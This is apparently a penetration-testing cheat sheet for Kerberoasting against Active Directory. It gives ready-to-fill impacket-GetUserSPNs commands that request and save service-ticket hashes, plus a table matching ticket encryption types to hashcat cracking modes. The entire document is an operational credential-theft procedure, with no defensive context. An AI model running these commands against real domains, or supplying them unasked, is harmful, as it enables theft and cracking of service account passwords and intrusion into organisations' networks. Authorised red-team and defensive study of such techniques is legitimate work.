Kerberoast¶
impacket-GetUserSPNs¶
| Action | Command |
|---|---|
| Request TGS for all roastable SPNs | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request |
| Request TGS for specific user | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -target-user <svc_user> |
| Save to file (hashcat format) | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.hashes |
Crack With Hashcat¶
- Identify the hash type below
| TGS etype | Hashcat mode | Hash format signature (starts like…) |
|---|---|---|
| RC4-HMAC (etype 23) | 13100 | $krb5tgs$23$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |
| AES128-CTS-HMAC-SHA1-96 (etype 17) | 19600 | $krb5tgs$17$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |
| AES256-CTS-HMAC-SHA1-96 (etype 18) | 19700 | $krb5tgs$18$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |